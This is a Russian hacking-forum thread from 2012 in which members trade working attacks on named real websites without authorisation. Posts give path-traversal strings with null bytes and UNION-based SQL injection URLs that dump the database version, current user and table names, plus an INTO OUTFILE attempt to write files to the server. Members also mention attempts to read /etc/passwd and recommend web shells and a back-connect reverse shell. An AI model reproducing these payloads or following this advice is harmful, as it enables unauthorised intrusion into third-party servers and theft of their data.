HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.12.2012, 17:35
qwwertty
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами: 8618274

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
Если у Вас используется php >5.3, то там данная дыра уже закрыта
MQ=Off ??
_ttp://mreseo.com/hosting.php?id=../123%00
Так что вернёт ???
На основании чего такие предположения ?
Скорее всего юзер ограничен своей директорией.

Код:
/home/content/28/9889628/html/mreseo/
Код:
?id=../123%00
Failed opening 'pages/../123\0.php'
 
Ответить с цитированием

  #2  
Старый 19.12.2012, 17:50
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от qwwertty  
Скорее всего юзер ограничен своей директорией.
Код:
/home/content/28/9889628/html/mreseo/
Код:
?id=../123%00
Failed opening 'pages/../123\0.php'
Причем здесь ограничения в директории? Ответ уже был дан: версия php 5.3, ////4096/// не прокатит, как и %00 из-за настрек в php.ini, поэтому расширение .php вы не как не отбросите.

ПРУФ: ?id=../index
 
Ответить с цитированием

  #3  
Старый 19.12.2012, 20:41
qwwertty
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами: 8618274

Репутация: 0
По умолчанию

Ещё интересна возможность раскрутки такой скули.

Код:
_ttps://www.trimaxcloud.com/partner.php?id=7'&idsub=39'
Кавычки экранирует, вывода нет.

Всё что есть - раскрытие путей

Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\wamp2\www\partner.php on line 10
По тому же дорку:

Код:
_ttp://www.tcilmanagedservices.com/partner.php?id=7'&idsub=39'
P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.
 
Ответить с цитированием

  #4  
Старый 20.12.2012, 13:05
zloy_fantom
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами: 7074326

Репутация: 0
По умолчанию

Вот нашел скрипт, позволяющий, как мне кажется то-ли залить файл на сервер, то-ли запустить скрипт.

Но моих познаний явно не хватает для оценки его возможностей:

Код:
 0)

			$c = ' $(function() { $("select[name=type]").val ('.$CURUSER['cs_last_type'].') });
 ';

		$c .='

				Заголовок:

				

				Тип:

				'.$o.'

				Отрывок:
	
			

				

			';

		$title = 'Добавить код';

	}
	else
	{
		$text  = $_POST['text'];

		$title = strip_tags ($_POST['title']);

		$type  = intval ($_POST['type']);

		
		include ('include/geshi.php');

		$language 	= strtolower ($types[$type]);

		$path 		= 'include/geshi/';

		$geshi 		= new GeSHi($text, $language, $path);

		$geshi->enable_line_numbers (GESHI_FANCY_LINE_NUMBERS);

		$geshi->set_tab_width (4);

		$hltext 	= $geshi->parse_code();

		
		sql_query ("INSERT INTO `codeshare` SET

					`title`   	= ".sqlesc ($title).",

					`user_id` 	= ".$CURUSER['id'].",

					`type`		= ".$type.",

					`size`		= ".mb_strlen ($text)."

					");

		$id = mysql_insert_id ();

		sql_query ("INSERT INTO `codeshare_data` SET

					`id`  		= ".$id.",

					`text`		= ".sqlesc (htmlspecialchars ($text, ENT_COMPAT, 'UTF-8')).",

					`hltext`	= ".sqlesc ($hltext)."

				  ");//or die (mysql_error ());

		sql_query ('UPDATE `users` SET `cs_last_type` = '.$type.' WHERE `id` = '.$CURUSER['id']);

		header ('Location: /codeshare.php?id='.$id);

		die ();
	}
?>
Если он может выполнять другой код, то мне достаточно провести инъекцию и выполнить ее используя этот скрипт.

Подскажите, как это сделать, или укажите утилиту, которая может проанализировать код на уязвимость

Спасибо
 
Ответить с цитированием

  #5  
Старый 20.12.2012, 14:05
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от qwwertty  
Кавычки экранирует, вывода нет.
Всё что есть - раскрытие путей
Бред пишешь.

_ttps://www.trimaxcloud.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1, @@version,3,4+--+

_ttp://www.tcilmanagedservices.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1, @@version,3,4+--+

Цитата:
Сообщение от None  
P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.
Тем же WSO сделай бэкконект и сиди со своей консольки.

Ещё как альтернативу юзаю P.A.S. шелл.
 
Ответить с цитированием

  #6  
Старый 20.12.2012, 17:02
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Есть SQLi

Код:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+
В ответ получаю

Цитата:
Сообщение от None  
Incorrect database name 'mysql.o'
Не могу вкурить в чем проблема
 
Ответить с цитированием

  #7  
Старый 20.12.2012, 17:28
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от WendM  
Есть SQLi
Код:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+
В ответ получаю
Не могу вкурить в чем проблема
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+

Вердикт неутешителен - фильтруется "точка"

Замены типа %2e и %252e не помогают.
 
Ответить с цитированием

  #8  
Старый 20.12.2012, 17:35
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
_http://www.lory-press.ru/showreview.php?id=9999999999999.9+order+by+4+--+

А почему тут не фильтруется?
 
Ответить с цитированием

  #9  
Старый 20.12.2012, 18:08
qwwertty
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами: 8618274

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
Ты не прав, скорее всего база пуста.

В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"

В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает

Пруф>>>

_tp://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,u ser%28%29,3,4+--+
 
Ответить с цитированием

  #10  
Старый 20.12.2012, 18:16
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от qwwertty  
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает
Проверил ещё раз.

Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+

File_Priv=N

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.